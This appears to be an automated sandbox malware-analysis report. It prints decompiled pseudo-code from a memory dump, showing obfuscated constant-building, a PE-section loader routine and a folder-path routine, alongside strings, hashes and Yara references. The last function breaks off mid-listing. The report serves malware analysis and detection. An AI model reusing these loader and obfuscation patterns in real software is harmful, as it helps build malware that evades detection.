0x00000000
0x0023e963
0x0023e847
0x0023e925
0x00000000
0x0023e925
0x0023e84f
0x0023ea31
0x0023ea31
0x0023ea37
0x00000000
0x00000000
0x00000000
0x0023ea37
0x0023e88c
0x0023e891
0x0023e896
0x0023e8cf
0x0023e8e4
0x0023e8e4
0x0023e8e6
0x0023e91e
0x0023e8e8
0x0023e8ef
0x0023e90c
0x0023e911
0x0023e914
0x0023e914
0x00000000
0x0023e8e6
0x0023e898
0x0023e89a
0x0023e8b9
0x0023e8bd
0x0023e8d8
0x0023e8df
0x0023e8df
0x00000000
0x0023e8df
0x0023e8bf
0x0023e8bf
0x0023e8c5
0x0023e8c6
0x00000000
0x0023e8c6
0x0023ea26
0x0023ea2c
0x00000000

Strings

^, xrefs: 0023E59F
ve(, xrefs: 0023E7DA
HH, xrefs: 0023E7AD
o, xrefs: 0023E712
&!, xrefs: 0023E74A
n`, xrefs: 0023E44A
?, xrefs: 0023E6E7
|E, xrefs: 0023E5AF
M:, xrefs: 0023E505
ve(, xrefs: 0023E8DF
w]4S, xrefs: 0023E56B
h|, xrefs: 0023E483

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
API String ID: 823142352-1348462970
Opcode ID: f09502523fef88919c0c1632ccc10a26b21da76b79abd427d4cf3bcea4caab25
Instruction ID: 6f425dee6e127b4917b8fc6cbd7d33fe8a1ccfb45088ea1c7c2e752b8fe815bf
Opcode Fuzzy Hash: f09502523fef88919c0c1632ccc10a26b21da76b79abd427d4cf3bcea4caab25
Instruction Fuzzy Hash: 02F131B15193819FE768CF25C54AA5BBBF1BBC4708F108A1DF1DA862A0D7B58919CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00246DB9, Relevance: 15.2, Strings: 12, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00246DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0023602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00243811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00237EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00242674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00242674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0023F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0023E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00244FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}

0x00246dbe
0x00246dc5
0x00246dcc
0x00246dd3
0x00246dda
0x00246ddc
0x00246dde
0x00246ddf
0x00246de4
0x00246dee
0x00246df9
0x00246e08
0x00246e0b
0x00246e0f
0x00246e17
0x00246e1f
0x00246e27
0x00246e2c
0x00246e31
0x00246e39
0x00246e41
0x00246e49
0x00246e51
0x00246e59
0x00246e61
0x00246e71
0x00246e75
0x00246e7d
0x00246e85
0x00246e8d
0x00246e95
0x00246e9d
0x00246ea5
0x00246eaa
0x00246eb2
0x00246eb6
0x00246ebe
0x00246ec6
0x00246ece
0x00246ed6
0x00246ede
0x00246eeb
0x00246eec
0x00246ef0
0x00246ef4
0x00246efc
0x00246f04
0x00246f0c
0x00246f14
0x00246f21
0x00246f25
0x00246f2a
0x00246f32
0x00246f3a
0x00246f3f
0x00246f47
0x00246f4f
0x00246f57
0x00246f5f
0x00246f67
0x00246f6f
0x00246f74
0x00246f7c
0x00246f8a
0x00246f8e
0x00246f96
0x00246fa3
0x00246fa7
0x00246fb1
0x00246fb6
0x00246fbe
0x00246fc6
0x00246fce
0x00246fd6
0x00246fe4
0x00246fe9
0x00246fef
0x00246ff7
0x00247004
0x00247007
0x0024700b
0x00247013
0x00247018
0x00247020
0x0024702d
0x00247031
0x0024703c
0x0024703d
0x00247043
0x0024704b
0x00247053
0x00247060
0x00247064
0x0024706c
0x00247077
0x0024707f
0x0024708a
0x00247092
0x0024709a
0x002470a2
0x002470aa
0x002470b5
0x002470b9
0x002470be
0x002470c6
0x002470ce
0x002470d6
0x002470f5
0x002470fa
0x002470fc
0x00247101
0x002471ee
0x002471ee
0x0024712d
0x0024712f
0x00247134
0x002471e7
0x00000000
0x002471e7
0x00247157
0x00247160
0x0024716d
0x0024716f
0x002471aa
0x0024718d
0x0024719f
0x002471a4
0x002471a7
0x002471a7
0x002471b2
0x002471b9
0x002471c4
0x002471c6
0x002471dd
0x002471e5
0x002471e5
0x00000000

Strings

2U, xrefs: 00246E75
IB, xrefs: 002470A2
ei, xrefs: 00246E95
P, xrefs: 00246E1F
,, xrefs: 00246EFC
R), xrefs: 0024709A
"t, xrefs: 00246E39
z, xrefs: 00247020
2, xrefs: 00246F96
om, xrefs: 00246FD6
2!, xrefs: 00246FEF
?s, xrefs: 0024706C

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
API String ID: 0-3377435326
Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction ID: fb58a9e04fa6574d5e5616dac5a90d4baf9d6f3e43beb76c1edab8c68f0e0aa3
Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction Fuzzy Hash: 7BB123725187809FE368CF25C88A90BFBF1BBC4358F508A1CF695862A0C7B9C559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00236D9F, Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00236D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0024889D(0x24c930, _v1076, __eflags);
								_t368 =  *0x24ca2c; // 0x5d8300
								__eflags = _t368 + 0x230;
								_t419 =  *0x24ca2c; // 0x5d8300
								E002329E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00242025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x24ca2c; // 0x5d8300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0023C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002365A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00240ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00231AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0024889D(0x24c9d0, _v1184, _t440);
													_pop(_t405);
													E00243EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x24c9d0, _v1124, _v1208, 0x24c9d0, _v1164, 0x24c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00242025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}

0x00236d9f
0x00236da5
0x00236db2
0x00236dbb
0x00236dc3
0x00236dcb
0x00236dd0
0x00236dd8
0x00236de0
0x00236de5
0x00236ded
0x00236df5
0x00236dfd
0x00236e05
0x00236e0d
0x00236e19
0x00236e20
0x00236e2b
0x00236e30
0x00236e36
0x00236e3e
0x00236e46
0x00236e59
0x00236e5a
0x00236e61
0x00236e6c
0x00236e74
0x00236e79
0x00236e7e
0x00236e86
0x00236e8e
0x00236e96
0x00236e9e
0x00236ea6
0x00236eae
0x00236eb9
0x00236ec4
0x00236ecf
0x00236ed7
0x00236ee1
0x00236ee5
0x00236eed
0x00236ef5
0x00236efa
0x00236f02
0x00236f07
0x00236f0f
0x00236f1a
0x00236f25
0x00236f30
0x00236f38
0x00236f40
0x00236f45
0x00236f4d
0x00236f58
0x00236f63
0x00236f6e
0x00236f79
0x00236f84
0x00236f8f
0x00236fa3
0x00236faa
0x00236fb5
0x00236fbd
0x00236fc5
0x00236fca
0x00236fd2
0x00236fda
0x00236fe4
0x00236ff2
0x00236ff7
0x00236ffd
0x00237005
0x0023700d
0x00237015
0x0023701a
0x00237022
0x0023702a
0x00237032
0x0023703a
0x0023703f
0x00237047
0x0023704f
0x0023705a
0x00237062
0x0023706d
0x00237078
0x00237083
0x0023708e
0x00237096
0x0023709b
0x002370a3
0x002370ab
0x002370b3
0x002370bb
0x002370c3
0x002370cb
0x002370d8
0x002370db
0x002370df
0x002370e4
0x002370ec
0x002370f4
0x002370fc
0x00237104
0x0023710c
0x00237114
0x0023711f
0x00237127
0x00237132
0x0023713a
0x00237142
0x0023714a
0x00237152
0x0023715a
0x0023715f
0x00237167
0x0023716c
0x00237174
0x0023717c
0x00237184
0x00237189
0x00237191
0x002371a7
0x002371ae
0x002371b9
0x002371c1
0x002371c6
0x002371ce
0x002371d6
0x002371e2
0x002371e5
0x002371e9
0x002371ee
0x002371f6
0x002371fe
0x0023720b
0x00237210
0x00237218
0x00237220
0x0023722b
0x00237236
0x00237241
0x00237249
0x0023724e
0x00237253
0x0023725b
0x00237263
0x00237268
0x00237270
0x00237278
0x00237280
0x00237285
0x0023728a
0x00237292
0x00237299
0x002372a1
0x002372a9
0x002372b1
0x002372b9
0x002372c4
0x002372cf
0x002372da
0x002372e2
0x002372e7
0x002372ec
0x002372f4
0x002372fc
0x002372fc
0x002372fe
0x002372ff
0x002372ff
0x002372ff
0x00237304
0x00237304
0x0023730a
0x00237487
0x00237497
0x002374bb
0x002374c0
0x002374d5
0x002374e1
0x002374f7
0x002374fc
0x002374ff
0x00000000
0x00237310
0x00237316
0x00237467
0x0023746d
0x00237478
0x00237478
0x0023747b
0x00000000
0x00000000
0x00237475
0x00237475
0x00237475
0x0023747d
0x00237480
0x00000000
0x0023731c
0x00237322
0x00237433
0x00237434
0x00237455
0x0023745a
0x0023745d
0x00000000
0x00237328
0x0023732e
0x00237537
0x00237334
0x00237336
0x002373d6
0x002373db
0x00237413
0x0023741a
0x0023741d
0x0023741f
0x00237427
0x002372fc
0x002372fc
0x002372fe
0x002372ff
0x002372ff
0x00000000
0x002372ff
0x0023733c
0x0023733c
0x0023733e
0x00237344
0x00237351
0x00237356
0x00237392
0x002373b4
0x002373b7
0x002373bc
0x00237504
0x00237506
0x0023750b
0x0023750b
0x00000000
0x0023733e
0x00237336
0x0023732e
0x00237322
0x00237316
0x0023753f
0x00237550
0x0023750c
0x0023750c
0x00000000
0x00237518
0x002372ff

Strings

), xrefs: 00236DD0
c, xrefs: 00237032
6oD, xrefs: 00236DA5
"D, xrefs: 00236DC3
<], xrefs: 00236E3E
Sg, xrefs: 00237220
RX, xrefs: 0023725B
g)s, xrefs: 00237127
C', xrefs: 002371B9
7i, xrefs: 00236FCA
`c, xrefs: 00236E6C

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
API String ID: 1514166925-3192994148
Opcode ID: 359d5774a81b166ce332722f6b2da11cc746ba0cb66d68a7f4fc9c412c1fa46b
Instruction ID: fab8afe8c8a666489120921d993541215d9e2d5878b52d534482f681a22b0ddc
Opcode Fuzzy Hash: 359d5774a81b166ce332722f6b2da11cc746ba0cb66d68a7f4fc9c412c1fa46b
Instruction Fuzzy Hash: 880215B15197819FE3A5CF65C84AA4BBBE1FBC5748F10890CF2D9862A0D7B58919CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0023BB3A, Relevance: 14.0, Strings: 11, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0023BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0023602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
